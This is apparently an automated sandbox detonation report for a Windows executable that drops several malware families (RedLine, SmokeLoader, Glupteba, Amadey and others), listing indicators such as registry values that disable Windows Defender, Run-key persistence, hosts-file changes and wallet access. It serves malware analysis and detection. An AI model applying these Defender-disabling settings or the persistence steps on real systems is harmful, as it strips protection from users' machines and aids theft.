Analysis Overview
SHA256
3a38b442e5943fc91da9dfc20beba22560217bcfde63e5432220d2fc285a9635
Threat Level: Known bad
The file 3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe was found to be: Known bad.
Malicious Activity Summary
Healer
SmokeLoader
Detects Healer an antivirus disabler dropper
Glupteba
Suspicious use of NtCreateUserProcessOtherParentProcess
Amadey
SectopRAT
RedLine payload
Glupteba payload
Modifies Windows Defender Real-time Protection settings
RedLine
SectopRAT payload
Downloads MZ/PE file
Drops file in Drivers directory
Blocklisted process makes network request
Modifies Windows Firewall
Stops running service(s)
Reads user/profile data of web browsers
Executes dropped EXE
Windows security modification
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Detected potential entity reuse from brand paypal.
Launches sc.exe
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs net.exe
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-03 23:57
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-03 23:57
Reported
2023-11-03 23:59
Platform
win10v2004-20231025-en
Max time kernel
91s
Max time network
153s
Command Line
Signatures
Amadey
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Healer
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 6200 created 3256 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\b8792114.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4A79.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3DB5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3DB5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\a3425420.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\3a38b442e5943fc91da9dfc20beba22560217bcfde63e.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7822687.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v1106597.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\B07.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\En1HV4Ys.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\uL6Fa5TM.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sd7uw5fi.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hq3gO0Jh.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4188 set thread context of 1132 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5864 set thread context of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\BBuster\Lang\is-3T1IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-TL0KN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-KK536.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\is-F8NJE.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-R8CUO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-LS9UM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-9V5RM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-M2P81.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-FUEO3.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\is-L3E1H.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-GV7JL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-OR0GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-PULBH.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-7V2KS.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Help\is-1EPTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\BBuster\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\BBuster\BBuster.exe | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-052B8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-9VRFD.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-K0DNA.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-DAPLO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-RUDTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-JM5GL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Online\is-ERGOO.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-0DMVE.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-O3HM8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-E9UJ8.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-4T21D.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Online\is-AAPMC.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-1DARK.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-89G2R.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Plugins\is-6GQIU.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
| File created | C:\Program Files (x86)\BBuster\Lang\is-QADKN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TBBB2.tmp\is-O5I6Q.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\c5767668.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
